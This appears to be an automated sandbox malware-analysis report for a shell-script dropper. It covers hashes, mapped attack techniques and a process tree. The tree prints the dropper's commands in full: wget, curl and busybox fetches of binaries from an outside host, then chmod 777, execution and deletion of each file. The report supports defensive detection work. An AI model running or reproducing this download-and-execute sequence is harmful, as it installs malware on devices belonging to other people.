Analysis
-
max time kernel
149s -
max time network
152s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
21/10/2024, 01:39
Static task
static1
Behavioral task
behavioral1
Sample
4ba9bb8fa9e0dc7ead37eb8c8edd6adc0a93dd875e03e031cb1a1f34879a50dd.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
4ba9bb8fa9e0dc7ead37eb8c8edd6adc0a93dd875e03e031cb1a1f34879a50dd.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
4ba9bb8fa9e0dc7ead37eb8c8edd6adc0a93dd875e03e031cb1a1f34879a50dd.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
4ba9bb8fa9e0dc7ead37eb8c8edd6adc0a93dd875e03e031cb1a1f34879a50dd.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
4ba9bb8fa9e0dc7ead37eb8c8edd6adc0a93dd875e03e031cb1a1f34879a50dd.sh
-
Size
10KB
-
MD5
95182cb1a6c811823bdbe664fb8ebdf7
-
SHA1
05149e5200d9a87556f3bd0c65e34323d70432a5
-
SHA256
4ba9bb8fa9e0dc7ead37eb8c8edd6adc0a93dd875e03e031cb1a1f34879a50dd
-
SHA512
e4352c11296cd61aa621b235b5b606bd514e11d8ea7f1f0c995d44bffac31476e83638aa6c8f5515f7392ae680fc1be7ad4e62ea026ffe5cb2f063950e6ffa7e
-
SSDEEP
192:sFi6S/T/e2aFgAuWzGciFi6S/TG2aFgAoG:sFi6S/T/NWzhiFi6S/TM
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 16 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 895 chmod 794 chmod 839 chmod 881 chmod 811 chmod 867 chmod 888 chmod 832 chmod 853 chmod 874 chmod 846 chmod 860 chmod 902 chmod 804 chmod 818 chmod 825 chmod -
Executes dropped EXE 16 IoCs
ioc pid Process /tmp/xnPfgtRvwJANl1ahPWsPBKLcUgiz4GrxCl 795 xnPfgtRvwJANl1ahPWsPBKLcUgiz4GrxCl /tmp/CcEcBu9Qbw4JnIxC9S8bJ0Kg9QIWEpryPb 805 CcEcBu9Qbw4JnIxC9S8bJ0Kg9QIWEpryPb /tmp/M2XBMJEtQwQbSyOCmtH3OL2KVd9uelsYpH 812 M2XBMJEtQwQbSyOCmtH3OL2KVd9uelsYpH /tmp/JTHeDVs0b3PLuigGe5MAIY00ByWiLBEHEI 819 JTHeDVs0b3PLuigGe5MAIY00ByWiLBEHEI /tmp/c1ju00Mjtb5goTVYQmVvT0aIZUL1JGhN7q 826 c1ju00Mjtb5goTVYQmVvT0aIZUL1JGhN7q /tmp/bjROIZphgE1u8yIeWs9ROb0pBi6R0D4cKv 833 bjROIZphgE1u8yIeWs9ROb0pBi6R0D4cKv /tmp/eHbAkKQLfU9Asy8fTjlonFqPRtq0YKAk4K 840 eHbAkKQLfU9Asy8fTjlonFqPRtq0YKAk4K /tmp/VaCZcok9OX9dBbtqHUqqOoZtraa2rGel7B 847 VaCZcok9OX9dBbtqHUqqOoZtraa2rGel7B /tmp/J7zCzTJ6PbYMlC8936g2B88g3fhupVq3Gg 854 J7zCzTJ6PbYMlC8936g2B88g3fhupVq3Gg /tmp/8BJzxjioHzKwwvQrYWuHxhdfw96e89DD83 861 8BJzxjioHzKwwvQrYWuHxhdfw96e89DD83 /tmp/uuZcLlnc1ROy2ODi0QucGQpoInA5ZHKBCn 868 uuZcLlnc1ROy2ODi0QucGQpoInA5ZHKBCn /tmp/76JI0PZk8vEvBSXz9VMTmr3dm77w8Jpmsr 875 76JI0PZk8vEvBSXz9VMTmr3dm77w8Jpmsr /tmp/EMrXsGwwkn0Cg0JUhVgWYVG7dhzGRPjjjC 882 EMrXsGwwkn0Cg0JUhVgWYVG7dhzGRPjjjC /tmp/3cBTDynN9yFWaYCu2hWYDOAZzZ9FoHMNWf 889 3cBTDynN9yFWaYCu2hWYDOAZzZ9FoHMNWf /tmp/J7zCzTJ6PbYMlC8936g2B88g3fhupVq3Gg 896 J7zCzTJ6PbYMlC8936g2B88g3fhupVq3Gg /tmp/8BJzxjioHzKwwvQrYWuHxhdfw96e89DD83 903 8BJzxjioHzKwwvQrYWuHxhdfw96e89DD83 -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 49 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 824 busybox 863 wget 899 curl 901 busybox 801 curl 817 busybox 880 busybox 892 curl 898 wget 850 curl 866 busybox 838 busybox 870 wget 877 wget 905 wget 828 wget 835 wget 836 curl 849 wget 857 curl 859 busybox 864 curl 873 busybox 797 wget 808 curl 885 curl 891 wget 807 wget 856 wget 815 curl 821 wget 829 curl 842 wget 852 busybox 871 curl 803 busybox 810 busybox 894 busybox 814 wget 831 busybox 843 curl 878 curl 884 wget 887 busybox 761 curl 793 busybox 845 busybox 690 wget 822 curl -
Writes file to tmp directory 16 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/VaCZcok9OX9dBbtqHUqqOoZtraa2rGel7B curl File opened for modification /tmp/8BJzxjioHzKwwvQrYWuHxhdfw96e89DD83 curl File opened for modification /tmp/uuZcLlnc1ROy2ODi0QucGQpoInA5ZHKBCn curl File opened for modification /tmp/EMrXsGwwkn0Cg0JUhVgWYVG7dhzGRPjjjC curl File opened for modification /tmp/J7zCzTJ6PbYMlC8936g2B88g3fhupVq3Gg curl File opened for modification /tmp/M2XBMJEtQwQbSyOCmtH3OL2KVd9uelsYpH curl File opened for modification /tmp/J7zCzTJ6PbYMlC8936g2B88g3fhupVq3Gg curl File opened for modification /tmp/c1ju00Mjtb5goTVYQmVvT0aIZUL1JGhN7q curl File opened for modification /tmp/eHbAkKQLfU9Asy8fTjlonFqPRtq0YKAk4K curl File opened for modification /tmp/CcEcBu9Qbw4JnIxC9S8bJ0Kg9QIWEpryPb curl File opened for modification /tmp/JTHeDVs0b3PLuigGe5MAIY00ByWiLBEHEI curl File opened for modification /tmp/bjROIZphgE1u8yIeWs9ROb0pBi6R0D4cKv curl File opened for modification /tmp/76JI0PZk8vEvBSXz9VMTmr3dm77w8Jpmsr curl File opened for modification /tmp/3cBTDynN9yFWaYCu2hWYDOAZzZ9FoHMNWf curl File opened for modification /tmp/8BJzxjioHzKwwvQrYWuHxhdfw96e89DD83 curl File opened for modification /tmp/xnPfgtRvwJANl1ahPWsPBKLcUgiz4GrxCl curl
Processes
-
/tmp/4ba9bb8fa9e0dc7ead37eb8c8edd6adc0a93dd875e03e031cb1a1f34879a50dd.sh/tmp/4ba9bb8fa9e0dc7ead37eb8c8edd6adc0a93dd875e03e031cb1a1f34879a50dd.sh1⤵PID:687
-
/bin/rm/bin/rm bins.sh2⤵PID:688
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/xnPfgtRvwJANl1ahPWsPBKLcUgiz4GrxCl2⤵
- System Network Configuration Discovery
PID:690
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/xnPfgtRvwJANl1ahPWsPBKLcUgiz4GrxCl2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:761
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/xnPfgtRvwJANl1ahPWsPBKLcUgiz4GrxCl2⤵
- System Network Configuration Discovery
PID:793
-
-
/bin/chmodchmod 777 xnPfgtRvwJANl1ahPWsPBKLcUgiz4GrxCl2⤵
- File and Directory Permissions Modification
PID:794
-
-
/tmp/xnPfgtRvwJANl1ahPWsPBKLcUgiz4GrxCl./xnPfgtRvwJANl1ahPWsPBKLcUgiz4GrxCl2⤵
- Executes dropped EXE
PID:795
-
-
/bin/rmrm xnPfgtRvwJANl1ahPWsPBKLcUgiz4GrxCl2⤵PID:796
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/CcEcBu9Qbw4JnIxC9S8bJ0Kg9QIWEpryPb2⤵
- System Network Configuration Discovery
PID:797
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/CcEcBu9Qbw4JnIxC9S8bJ0Kg9QIWEpryPb2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:801
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/CcEcBu9Qbw4JnIxC9S8bJ0Kg9QIWEpryPb2⤵
- System Network Configuration Discovery
PID:803
-
-
/bin/chmodchmod 777 CcEcBu9Qbw4JnIxC9S8bJ0Kg9QIWEpryPb2⤵
- File and Directory Permissions Modification
PID:804
-
-
/tmp/CcEcBu9Qbw4JnIxC9S8bJ0Kg9QIWEpryPb./CcEcBu9Qbw4JnIxC9S8bJ0Kg9QIWEpryPb2⤵
- Executes dropped EXE
PID:805
-
-
/bin/rmrm CcEcBu9Qbw4JnIxC9S8bJ0Kg9QIWEpryPb2⤵PID:806
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/M2XBMJEtQwQbSyOCmtH3OL2KVd9uelsYpH2⤵
- System Network Configuration Discovery
PID:807
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/M2XBMJEtQwQbSyOCmtH3OL2KVd9uelsYpH2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:808
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/M2XBMJEtQwQbSyOCmtH3OL2KVd9uelsYpH2⤵
- System Network Configuration Discovery
PID:810
-
-
/bin/chmodchmod 777 M2XBMJEtQwQbSyOCmtH3OL2KVd9uelsYpH2⤵
- File and Directory Permissions Modification
PID:811
-
-
/tmp/M2XBMJEtQwQbSyOCmtH3OL2KVd9uelsYpH./M2XBMJEtQwQbSyOCmtH3OL2KVd9uelsYpH2⤵
- Executes dropped EXE
PID:812
-
-
/bin/rmrm M2XBMJEtQwQbSyOCmtH3OL2KVd9uelsYpH2⤵PID:813
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/JTHeDVs0b3PLuigGe5MAIY00ByWiLBEHEI2⤵
- System Network Configuration Discovery
PID:814
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/JTHeDVs0b3PLuigGe5MAIY00ByWiLBEHEI2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:815
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/JTHeDVs0b3PLuigGe5MAIY00ByWiLBEHEI2⤵
- System Network Configuration Discovery
PID:817
-
-
/bin/chmodchmod 777 JTHeDVs0b3PLuigGe5MAIY00ByWiLBEHEI2⤵
- File and Directory Permissions Modification
PID:818
-
-
/tmp/JTHeDVs0b3PLuigGe5MAIY00ByWiLBEHEI./JTHeDVs0b3PLuigGe5MAIY00ByWiLBEHEI2⤵
- Executes dropped EXE
PID:819
-
-
/bin/rmrm JTHeDVs0b3PLuigGe5MAIY00ByWiLBEHEI2⤵PID:820
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/c1ju00Mjtb5goTVYQmVvT0aIZUL1JGhN7q2⤵
- System Network Configuration Discovery
PID:821
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/c1ju00Mjtb5goTVYQmVvT0aIZUL1JGhN7q2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:822
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/c1ju00Mjtb5goTVYQmVvT0aIZUL1JGhN7q2⤵
- System Network Configuration Discovery
PID:824
-
-
/bin/chmodchmod 777 c1ju00Mjtb5goTVYQmVvT0aIZUL1JGhN7q2⤵
- File and Directory Permissions Modification
PID:825
-
-
/tmp/c1ju00Mjtb5goTVYQmVvT0aIZUL1JGhN7q./c1ju00Mjtb5goTVYQmVvT0aIZUL1JGhN7q2⤵
- Executes dropped EXE
PID:826
-
-
/bin/rmrm c1ju00Mjtb5goTVYQmVvT0aIZUL1JGhN7q2⤵PID:827
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/bjROIZphgE1u8yIeWs9ROb0pBi6R0D4cKv2⤵
- System Network Configuration Discovery
PID:828
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/bjROIZphgE1u8yIeWs9ROb0pBi6R0D4cKv2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:829
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/bjROIZphgE1u8yIeWs9ROb0pBi6R0D4cKv2⤵
- System Network Configuration Discovery
PID:831
-
-
/bin/chmodchmod 777 bjROIZphgE1u8yIeWs9ROb0pBi6R0D4cKv2⤵
- File and Directory Permissions Modification
PID:832
-
-
/tmp/bjROIZphgE1u8yIeWs9ROb0pBi6R0D4cKv./bjROIZphgE1u8yIeWs9ROb0pBi6R0D4cKv2⤵
- Executes dropped EXE
PID:833
-
-
/bin/rmrm bjROIZphgE1u8yIeWs9ROb0pBi6R0D4cKv2⤵PID:834
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/eHbAkKQLfU9Asy8fTjlonFqPRtq0YKAk4K2⤵
- System Network Configuration Discovery
PID:835
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/eHbAkKQLfU9Asy8fTjlonFqPRtq0YKAk4K2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:836
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/eHbAkKQLfU9Asy8fTjlonFqPRtq0YKAk4K2⤵
- System Network Configuration Discovery
PID:838
-
-
/bin/chmodchmod 777 eHbAkKQLfU9Asy8fTjlonFqPRtq0YKAk4K2⤵
- File and Directory Permissions Modification
PID:839
-
-
/tmp/eHbAkKQLfU9Asy8fTjlonFqPRtq0YKAk4K./eHbAkKQLfU9Asy8fTjlonFqPRtq0YKAk4K2⤵
- Executes dropped EXE
PID:840
-
-
/bin/rmrm eHbAkKQLfU9Asy8fTjlonFqPRtq0YKAk4K2⤵PID:841
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/VaCZcok9OX9dBbtqHUqqOoZtraa2rGel7B2⤵
- System Network Configuration Discovery
PID:842
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/VaCZcok9OX9dBbtqHUqqOoZtraa2rGel7B2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:843
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/VaCZcok9OX9dBbtqHUqqOoZtraa2rGel7B2⤵
- System Network Configuration Discovery
PID:845
-
-
/bin/chmodchmod 777 VaCZcok9OX9dBbtqHUqqOoZtraa2rGel7B2⤵
- File and Directory Permissions Modification
PID:846
-
-
/tmp/VaCZcok9OX9dBbtqHUqqOoZtraa2rGel7B./VaCZcok9OX9dBbtqHUqqOoZtraa2rGel7B2⤵
- Executes dropped EXE
PID:847
-
-
/bin/rmrm VaCZcok9OX9dBbtqHUqqOoZtraa2rGel7B2⤵PID:848
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/J7zCzTJ6PbYMlC8936g2B88g3fhupVq3Gg2⤵
- System Network Configuration Discovery
PID:849
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/J7zCzTJ6PbYMlC8936g2B88g3fhupVq3Gg2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:850
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/J7zCzTJ6PbYMlC8936g2B88g3fhupVq3Gg2⤵
- System Network Configuration Discovery
PID:852
-
-
/bin/chmodchmod 777 J7zCzTJ6PbYMlC8936g2B88g3fhupVq3Gg2⤵
- File and Directory Permissions Modification
PID:853
-
-
/tmp/J7zCzTJ6PbYMlC8936g2B88g3fhupVq3Gg./J7zCzTJ6PbYMlC8936g2B88g3fhupVq3Gg2⤵
- Executes dropped EXE
PID:854
-
-
/bin/rmrm J7zCzTJ6PbYMlC8936g2B88g3fhupVq3Gg2⤵PID:855
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/8BJzxjioHzKwwvQrYWuHxhdfw96e89DD832⤵
- System Network Configuration Discovery
PID:856
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/8BJzxjioHzKwwvQrYWuHxhdfw96e89DD832⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:857
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/8BJzxjioHzKwwvQrYWuHxhdfw96e89DD832⤵
- System Network Configuration Discovery
PID:859
-
-
/bin/chmodchmod 777 8BJzxjioHzKwwvQrYWuHxhdfw96e89DD832⤵
- File and Directory Permissions Modification
PID:860
-
-
/tmp/8BJzxjioHzKwwvQrYWuHxhdfw96e89DD83./8BJzxjioHzKwwvQrYWuHxhdfw96e89DD832⤵
- Executes dropped EXE
PID:861
-
-
/bin/rmrm 8BJzxjioHzKwwvQrYWuHxhdfw96e89DD832⤵PID:862
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/uuZcLlnc1ROy2ODi0QucGQpoInA5ZHKBCn2⤵
- System Network Configuration Discovery
PID:863
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/uuZcLlnc1ROy2ODi0QucGQpoInA5ZHKBCn2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:864
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/uuZcLlnc1ROy2ODi0QucGQpoInA5ZHKBCn2⤵
- System Network Configuration Discovery
PID:866
-
-
/bin/chmodchmod 777 uuZcLlnc1ROy2ODi0QucGQpoInA5ZHKBCn2⤵
- File and Directory Permissions Modification
PID:867
-
-
/tmp/uuZcLlnc1ROy2ODi0QucGQpoInA5ZHKBCn./uuZcLlnc1ROy2ODi0QucGQpoInA5ZHKBCn2⤵
- Executes dropped EXE
PID:868
-
-
/bin/rmrm uuZcLlnc1ROy2ODi0QucGQpoInA5ZHKBCn2⤵PID:869
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/76JI0PZk8vEvBSXz9VMTmr3dm77w8Jpmsr2⤵
- System Network Configuration Discovery
PID:870
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/76JI0PZk8vEvBSXz9VMTmr3dm77w8Jpmsr2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:871
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/76JI0PZk8vEvBSXz9VMTmr3dm77w8Jpmsr2⤵
- System Network Configuration Discovery
PID:873
-
-
/bin/chmodchmod 777 76JI0PZk8vEvBSXz9VMTmr3dm77w8Jpmsr2⤵
- File and Directory Permissions Modification
PID:874
-
-
/tmp/76JI0PZk8vEvBSXz9VMTmr3dm77w8Jpmsr./76JI0PZk8vEvBSXz9VMTmr3dm77w8Jpmsr2⤵
- Executes dropped EXE
PID:875
-
-
/bin/rmrm 76JI0PZk8vEvBSXz9VMTmr3dm77w8Jpmsr2⤵PID:876
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/EMrXsGwwkn0Cg0JUhVgWYVG7dhzGRPjjjC2⤵
- System Network Configuration Discovery
PID:877
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/EMrXsGwwkn0Cg0JUhVgWYVG7dhzGRPjjjC2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:878
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/EMrXsGwwkn0Cg0JUhVgWYVG7dhzGRPjjjC2⤵
- System Network Configuration Discovery
PID:880
-
-
/bin/chmodchmod 777 EMrXsGwwkn0Cg0JUhVgWYVG7dhzGRPjjjC2⤵
- File and Directory Permissions Modification
PID:881
-
-
/tmp/EMrXsGwwkn0Cg0JUhVgWYVG7dhzGRPjjjC./EMrXsGwwkn0Cg0JUhVgWYVG7dhzGRPjjjC2⤵
- Executes dropped EXE
PID:882
-
-
/bin/rmrm EMrXsGwwkn0Cg0JUhVgWYVG7dhzGRPjjjC2⤵PID:883
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/3cBTDynN9yFWaYCu2hWYDOAZzZ9FoHMNWf2⤵
- System Network Configuration Discovery
PID:884
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/3cBTDynN9yFWaYCu2hWYDOAZzZ9FoHMNWf2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:885
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/3cBTDynN9yFWaYCu2hWYDOAZzZ9FoHMNWf2⤵
- System Network Configuration Discovery
PID:887
-
-
/bin/chmodchmod 777 3cBTDynN9yFWaYCu2hWYDOAZzZ9FoHMNWf2⤵
- File and Directory Permissions Modification
PID:888
-
-
/tmp/3cBTDynN9yFWaYCu2hWYDOAZzZ9FoHMNWf./3cBTDynN9yFWaYCu2hWYDOAZzZ9FoHMNWf2⤵
- Executes dropped EXE
PID:889
-
-
/bin/rmrm 3cBTDynN9yFWaYCu2hWYDOAZzZ9FoHMNWf2⤵PID:890
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/J7zCzTJ6PbYMlC8936g2B88g3fhupVq3Gg2⤵
- System Network Configuration Discovery
PID:891
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/J7zCzTJ6PbYMlC8936g2B88g3fhupVq3Gg2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:892
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/J7zCzTJ6PbYMlC8936g2B88g3fhupVq3Gg2⤵
- System Network Configuration Discovery
PID:894
-
-
/bin/chmodchmod 777 J7zCzTJ6PbYMlC8936g2B88g3fhupVq3Gg2⤵
- File and Directory Permissions Modification
PID:895
-
-
/tmp/J7zCzTJ6PbYMlC8936g2B88g3fhupVq3Gg./J7zCzTJ6PbYMlC8936g2B88g3fhupVq3Gg2⤵
- Executes dropped EXE
PID:896
-
-
/bin/rmrm J7zCzTJ6PbYMlC8936g2B88g3fhupVq3Gg2⤵PID:897
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/8BJzxjioHzKwwvQrYWuHxhdfw96e89DD832⤵
- System Network Configuration Discovery
PID:898
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/8BJzxjioHzKwwvQrYWuHxhdfw96e89DD832⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:899
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/8BJzxjioHzKwwvQrYWuHxhdfw96e89DD832⤵
- System Network Configuration Discovery
PID:901
-
-
/bin/chmodchmod 777 8BJzxjioHzKwwvQrYWuHxhdfw96e89DD832⤵
- File and Directory Permissions Modification
PID:902
-
-
/tmp/8BJzxjioHzKwwvQrYWuHxhdfw96e89DD83./8BJzxjioHzKwwvQrYWuHxhdfw96e89DD832⤵
- Executes dropped EXE
PID:903
-
-
/bin/rmrm 8BJzxjioHzKwwvQrYWuHxhdfw96e89DD832⤵PID:904
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/uuZcLlnc1ROy2ODi0QucGQpoInA5ZHKBCn2⤵
- System Network Configuration Discovery
PID:905
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97